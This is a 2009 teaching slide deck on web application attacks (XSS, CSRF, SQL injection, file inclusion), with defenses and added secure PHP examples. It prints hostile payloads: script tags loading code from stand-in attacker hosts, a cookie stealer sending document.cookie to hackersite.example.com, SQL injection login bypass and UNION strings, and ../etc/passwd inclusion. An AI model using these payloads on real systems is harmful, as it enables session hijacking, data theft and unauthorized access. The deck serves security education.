bemutefrogtownSecurity

Nov 18, 2013
Attacks and Methodologies Against Web-Based Applications

November 18, 2009

Who We Are
• Andrey Kolmakov
– umkolmak@cc.umanitoba.ca
• Brian Turchyn
– brian@dj-bri-t.net
– http://www.dj-bri-t.net
• Co-op students from University of Manitoba, working for Manitoba IPC

Overview
• Definitions
• Statistics
• Attack Information
• Demonstration
• Q&A
A Few Quick Notes
• Sample code is done in PHP5
• Some demonstrations will use DVWA
– http://www.dvwa.co.uk
• Other demonstrations use customized code
– Available online @ http://dj-bri-t.net/projects/

Definitions

What are Client-side Attacks?
• Attacks that target vulnerabilities in the client application that interacts with a server or service
• The application could be a:
– Web browser
– IM client
– Email client
– Any system with a UI that connects to a server
• We will be focusing on web applications
– Web GUIs (what you see in your browser)
What are Server-side Attacks?
• Complement of Client-side == Server-side
• Attacks the services, processes running on the server
– PHP
– MySQL
– Apache
– SSH
– FTP
– ...

Attack Types
• Many different styles of client- and server-side attacks
• Cross-site scripting (XSS)
• CSRF
• SQL Injection
• File Inclusion
• Page Hijacking
• Command Injection
• …
• Eval Injection
• Setting Manipulation
• Special Element Injection
• Account Lockout Attack
• Full Path Disclosure
• Cross-user Defacement
• …

What's The Big Deal?
• XSS can cause session hijacks, cookie stealing, CSRF, and browser worms.
• SQL Injection can compromise the entire database
– Passwords, configuration, administration info, etc
– Other security systems can be bypassed
• Browser sessions can be hijacked, forcing browsers to visit rogue pages, launching attacks on other web servers
What's The Big Deal?
• Many applications work with web-based frontends
– VMWare Server 2
– WebEx
– Firewall/IDS frontends
– Webmin (Server Admin OSS)
• Thus, these attacks become more pertinent to check for, since more and more sensitive data is potentially exposed.

Statistics
• WASC Web Application Security Statistics Project 2008
[Pie chart of vulnerability classes by share of findings: Cross-Site Scripting, Information Leakage, SQL Injection, Insufficient Transport Layer Protection, Fingerprinting, HTTP Response Splitting, Other]
http://www.ncircle.com/index.php?s=solution_Web-Application-Vulnerability-Statistics
http://projects.webappsec.org/Web-Application-Security-Statistics
Statistics
[Bar chart: Probability to Detect Vulnerabilities, by severity (Urgent, Critical, High, Medium, Low, U+C+H) for Scans, BlackBox and WhiteBox testing; y-axis 0% to 100%]
http://projects.webappsec.org/Web-Application-Security-Statistics

Attacks

Cross-Site Scripting
• Aka XSS
• Subset of HTML Injection
• Hijack user sessions
• Deface websites
• Inject hostile content
• OWASP: http://tinyurl.com/owasp-xss
Cross-Site Scripting
• Two main types of XSS
1. Persistent / Stored
2. Non-persistent / Reflected
• Persistent is stored in the DBMS to be recalled at a later time. URLs look harmless until they are loaded.
• Non-persistent is usually used in the URI or via a browser hijack w/ Ajax.

Cross-Site Scripting
• Some researchers claim that 68% of all websites are vulnerable
• SEO techniques used to lure victims to sites
– Halloween spam uses XSS to force user to download virus
• Google, Gmail, Yahoo! Mail, Facebook, MySpace, Orkut, MediaWiki - http://xssed.com

Cross-Site Scripting
    <?php
    if ( $_POST['SubmitMsg'] ) {
        ... // Add message to database
    }
    $q = mysql_query ( ... ); // Get guestbook entries
    foreach ( $q as $k => $v ) {
        echo "<b>" . $v["name"] . "</b>: ";           // name is written out unescaped
        echo htmlentities( $v["msg"] ) . "<br />\n";  // only msg is escaped
    }
    unset ($q, $k, $v);
    ?>
Cross-Site Scripting
• The simple test for basic XSS:
– <script>alert(1)</script>
• A simple alert box pops up
– A mild annoyance at best
• But, if you can do this, then you can do a lot more
– What's stopping you from importing a .js file?
– <script src=http://hack.example.com/virus.js></script>
• Line length considerations

Cross-Site Scripting
• Filtering on < and > brackets?
• No problem!
– Injecting properties into tags bypasses the angle bracket filtering process
• echo "<img src='" . $_GET['img'] . "' />\n";
• Normally, we would expect image.jpg to be there
• What about...
– image.jpg' onload='alert(document.cookie)

Cross-Site Scripting
• Detection can be performed manually and automatically.
• Automatic tools include Nikto, Nessus and Acunetix
– http://sectools.org/web-scanners.html
• Manually, you can use a cheat sheet
– http://ha.ckers.org/xss.html
Cross-Site Scripting: Defense
• Escaping/Sanitizing of user input
• Use a whitelist approach for acceptable characters
– A good start, but not a complete defense
• PHP: htmlentities
• JSP: escapeXml="true"
• ASP: HttpUtility.HtmlEncode
• RoR: h method: <%=h myText %>

Cross-Site Request Forgery
• AKA:
– Session Riding
– One-Click Attacks
– Cross Site Reference Forgery
– Hostile Linking
– Automation Attack
– XSRF
• OWASP: http://tinyurl.com/owasp-csrf

Cross-Site Request Forgery
• Causes unauthorized commands to be sent by an attacker to a website through a victim.
• Attacker puts specialized code on a web page
– Injected
– Attacker's site
• Victim visits compromised page
• Attacker's script is executed
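The guestbook from the XSS code slide, with the escaping defense applied to every untrusted value rather than only to msg. This is an added example, not code from the slides; it assumes PHP 5.4 or later, and the $entries rows are constructed in place of database results.

```php
<?php
// Added example, not from the original slides: the guestbook output from
// the XSS code slide with every untrusted value escaped, not just msg.
// Assumes PHP 5.4 or later (ENT_SUBSTITUTE). $entries is a constructed
// stand-in for the rows fetched from the database.

// One escaping helper so the rule lives in one place. ENT_QUOTES also
// encodes single quotes, which is what stops the image.jpg' onload='...
// attribute injection when a value lands inside src='...'.
function esc($value)
{
    return htmlentities((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Same markup as the slide, but name is escaped as well: on the slide only
// msg went through htmlentities, so script in the name field was stored XSS.
function render_guestbook(array $entries)
{
    $html = '';
    foreach ($entries as $row) {
        $html .= '<b>' . esc($row['name']) . '</b>: '
               . esc($row['msg']) . "<br />\n";
    }
    return $html;
}

// Constructed sample rows; the second reuses the payloads shown on the slides.
$entries = array(
    array('name' => 'alice', 'msg' => 'Hello <3'),
    array('name' => '<script>alert(1)</script>',
          'msg'  => "image.jpg' onload='alert(document.cookie)"),
);

// The <, >, ' and " characters reach the browser as entities, so both
// payloads are displayed as text instead of being parsed as markup.
echo render_guestbook($entries);
```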
Cross-Site Request Forgery
• Relies on the lack of a random authenticity token on the attacked server
• <input type='hidden' name='token' value='1f3870be274f6c49b3e31a0c6728957f'>
• Optionally, if the code is to be executed from another server, some form of HTML or Javascript injection usually needs to be present

Cross-Site Request Forgery
• URLs through image/iframe tags
– http://example.com/changepass.php?pass=123&cpass=123
• XSS
– <script src='http://hacker.example.com/attack.js'></script>
Cross-Site Request Forgery
• When an XSRF is possible, there are many attacks that can be performed
– Cookie stealer
• <script>document.write("<img src='http://hackersite.example.com/grabcookie.php?cookie=" + document.cookie + " ' ")</script>
– Browser hijacking
• Series of Ajax-based commands to force users through a series of pages
• The attacker can do anything on that site and make it appear to be done by you

Cross-Site Request Forgery: Defense
• Addition of a random authenticity token
– PHP: OWASP's CSRF Guard
– JSP: OWASP's CSRF Guard
– ASP: Html.AntiForgeryToken()
– RoR: Built-In
• Password verification

SQL Injection
• Injecting SQL queries via input data into the application.
• Read sensitive data
• Modify data
• Perform administrative functions
• Grab file contents on the server
• Write files to server
• OWASP: http://tinyurl.com/owasp-inject
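The random authenticity token defense from the CSRF slides, applied to the changepass.php request those slides use as their example. Added code, not from the slides or OWASP's CSRF Guard; it assumes PHP 7 or later and an active PHP session.

```php
<?php
// Added example, not from the original slides: the "random authenticity
// token" defense from the CSRF slides, guarding the changepass.php request.
// Assumes PHP 7 or later (random_bytes, hash_equals) and PHP sessions.
session_start();

// One token per session, created on first use from the CSPRNG and
// hex-encoded so it can sit safely inside an attribute value.
function csrf_token()
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The hidden field from the slide: <input type='hidden' name='token' value='...'>
function csrf_field()
{
    return "<input type='hidden' name='token' value='"
         . htmlentities(csrf_token(), ENT_QUOTES, 'UTF-8') . "'>\n";
}

// Run on every state-changing request. A request forged from another site
// (an <img> or <iframe> URL, an auto-submitted form) cannot carry this value
// because the other site cannot read the victim's session. hash_equals
// keeps the comparison free of a timing side channel.
function csrf_valid(array $post)
{
    if (empty($_SESSION['csrf_token']) || !isset($post['token']) || !is_string($post['token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $post['token']);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('Missing or invalid token');
    }
    // Token checked: safe to act on $_POST['pass'] and $_POST['cpass'] here.
} else {
    // GET only renders the form with the token embedded; the password change
    // itself is accepted via POST, never via a GET URL as on the slides.
    echo "<form method='post' action='changepass.php'>\n" . csrf_field()
       . "<input type='password' name='pass'> <input type='password' name='cpass'>\n"
       . "<input type='submit' value='Change password'>\n</form>\n";
}
```

The token does not help on a page that also has XSS: injected script runs in the victim's origin and can read the hidden field, which is why the slides pair XSRF with an HTML or JavaScript injection.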
SQL Injection
    <?php
    if ( $_POST['SubmitLogin'] )
    {
        $user = $_POST['user'];
        $password = $_POST['password'];
        $sql = mysql_query ( "SELECT * FROM users WHERE
            user = '$user' AND password = MD5('$password')" );
        if ( mysql_num_rows ( $sql ) )
            $_SESSION['logged_in'] = true;
    }
    ?>

SQL Injection
• mysql_query("SELECT * FROM users WHERE user_name='$user' AND password=md5($password)");
• The $user variable is vulnerable to SQL injection
• 1' or '1'='1
• mysql_query("SELECT * FROM users WHERE user_name='1' or '1'='1' AND password=md5($password)");

SQL Injection
• mysql_query("SELECT * FROM users WHERE user_name='$user' AND password=md5($password)");
• Inserting the string ' or '1'='1 will cause this to pass, allowing a user to authenticate.
• This is simple if the attacker knows the underlying database structure, but becomes more difficult when a database structure isn't known.
– We call this "Blind SQL Injection"
Blind SQL Injection
• Attacking a database without knowing its underlying structure.
• 1' or 1=1 UNION SELECT column_name, 1 FROM information_schema.columns WHERE table_name='users
• 1' or 1=1 UNION SELECT column_name, table_name FROM information_schema.columns WHERE '1'='1
• Automated tools make this attack very powerful
– SQLmap, Absinthe, SQLBrute, SQLiX, bsqlbf

SQL Injection: Defense
• Escape/Filter
• Many languages provide libraries for automating this task.
• PHP5 → MySQLi, PDO
• Java → PreparedStatement class
• C# → SqlCommand class
• RoR → Built-in to ActiveRecord::find

SQL Injection
• August 17, 2009 - Heartland Payment Systems, 7-Eleven, Hannaford
– 130 million credit card numbers
• July 2008 - Kaspersky
– Site hacked by "m0sted" using SQL Injection
• April 13, 2008 - Sexual and Violent Offender Registry of Oklahoma
– "Routine maintenance" after SSNs of 10,597 offenders had been stolen via SQL Injection
• June 29, 2007 - Microsoft UK
– Microsoft home page defaced using SQL Injection
• PHP-Nuke CMS - Criticized for having multiple SQL Injection flaws
– http://secunia.com/product/2385/?task=advisories
– http://secunia.com/product/13524/?task=advisories
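The login from the SQL Injection code slide rebuilt on PDO prepared statements, one of the PHP5 options listed on the defense slide. This is added code, not from the slides; it assumes PHP 7 or later (the mysql_* functions are gone there), a users table with columns user and password, and placeholder connection details.

```php
<?php
// Added example, not from the original slides: the login from the SQL
// Injection code slide rebuilt on PDO prepared statements. Assumes PHP 7+,
// a users table with columns user and password, and the placeholder DSN
// and credentials below (constructed for this example).
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app_user', 'app_password');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Real server-side prepares rather than client-side string emulation,
// so the binding is done by MySQL itself.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

// The SQL text is fixed and compiled first; $user is bound afterwards as
// data. The slide's  1' or '1'='1  is then looked up literally as a
// username, matches no row, and the login bypass no longer works.
function find_user(PDO $pdo, $user)
{
    $stmt = $pdo->prepare('SELECT user, password FROM users WHERE user = :user');
    $stmt->execute(array(':user' => (string) $user));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The slide compares MD5 inside the query; here the stored value is a
// password_hash() digest (salted, slow) checked with password_verify().
function login(PDO $pdo, $user, $password)
{
    $row = find_user($pdo, $user);
    if ($row === null) {
        // Unknown user: still do one hash check so the response time does
        // not reveal which usernames exist.
        password_verify((string) $password, password_hash('x', PASSWORD_DEFAULT));
        return false;
    }
    return password_verify((string) $password, $row['password']);
}

if (isset($_POST['SubmitLogin'])) {
    $user     = isset($_POST['user']) ? $_POST['user'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    if (login($pdo, $user, $password)) {
        $_SESSION['logged_in'] = true;
    }
}
```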
File Inclusion
• Forcing a page to include a file which it was otherwise not designed to include
• Local or Remote, depending on security policy
• Access to files on filesystem that HTTPd user has read rights to
• Load an external web page, allowing injection of Javascript, etc
• PHP security bypass
– PHP wrappers, i.e. php://input
– Compression/audio streams: zlib:// and ogg://
• OWASP: http://tinyurl.com/owasp-fi

File Inclusion
• How are these attacks performed?
– Typically through GET request
– Include.php?page=myfile
– Worse: include.php?page=myfile.php

File Inclusion
    <?php
    // includefile.php
    $file = $_GET['include'];
    include($file);

    // Rest of the page...
    ?>
• No filtering!
• Suicide!
• includefile.php?include=http://www.google.ca
• includefile.php?include=../../../../../../../etc/passwd
File Inclusion - Example
• allow_url_include = Off
• $file = preg_replace("#(http|https|ftp)://#si", "", $file);
• <?php
    $file = $_GET['include'];
    include( $file . ".php" );
  ?>

File Inclusion: Defense
• Severity of this exploit has dropped recently due to PHP5 default configuration
– allow_url_fopen = false by default
• Upgrades from PHP4 to PHP5 tend to leave configuration file with the previous settings, so upgrades may still be vulnerable
• This setting does not prevent local file inclusion – only remote file inclusion

File Inclusion: Defense
• Best prevention method: whitelist
– Most secure: array of allowed values
– Still pretty good: list of files in an allowed directory
– Frontend prevention
• Firewall rules
• Chroot jail
• PHP hardening
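The "array of allowed values" whitelist from the File Inclusion defense slides, shown beside the scheme-stripping plus ".php" suffix idea from the example slide. Added code, not from the slides; it assumes PHP 7 or later and a pages/ directory next to the script holding the includable files (names constructed here).

```php
<?php
// Added example, not from the original slides: the "array of allowed values"
// whitelist from the File Inclusion defense slides, beside the slide's weaker
// scheme-stripping version. Assumes PHP 7 or later and a pages/ directory
// next to this script; the page names below are constructed.

// Weak (the slide's preg_replace + ".php" idea): removing http:// etc. only
// addresses remote URLs. A ../ path can still reach any .php file on disk
// that the HTTPd user can read, and the scheme filter does nothing for a
// local include, so the parameter is still the attacker's choice of file.
function weak_resolve($name)
{
    $name = preg_replace('#(http|https|ftp)://#si', '', $name);
    return $name . '.php';
}

// Strong: the request parameter is only a key into a fixed table. Anything
// that is not a known key (wrappers such as php://input, traversal, remote
// URLs, or an array from ?page[]=x) is refused before include() is reached.
$ALLOWED_PAGES = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

function resolve_page(array $allowed, $name)
{
    if ($name === null || $name === '') {
        return $allowed['home'];          // default when no page is requested
    }
    if (!is_string($name) || !isset($allowed[$name])) {
        return null;                      // unknown or malformed: refuse
    }
    return $allowed[$name];
}

$requested = isset($_GET['page']) ? $_GET['page'] : null;
$page = resolve_page($ALLOWED_PAGES, $requested);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
// Anchored to this script's directory; $page is one of our own literals.
include __DIR__ . '/' . $page;
```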
Resources
• http://www.owasp.org
• http://www.sans.org
• http://www.webappsec.org
• http://www.ncircle.com
• http://xssed.com

Resources
• Top 10 2010 RC has been released November 13, 2009
• Latest security threats

Demonstration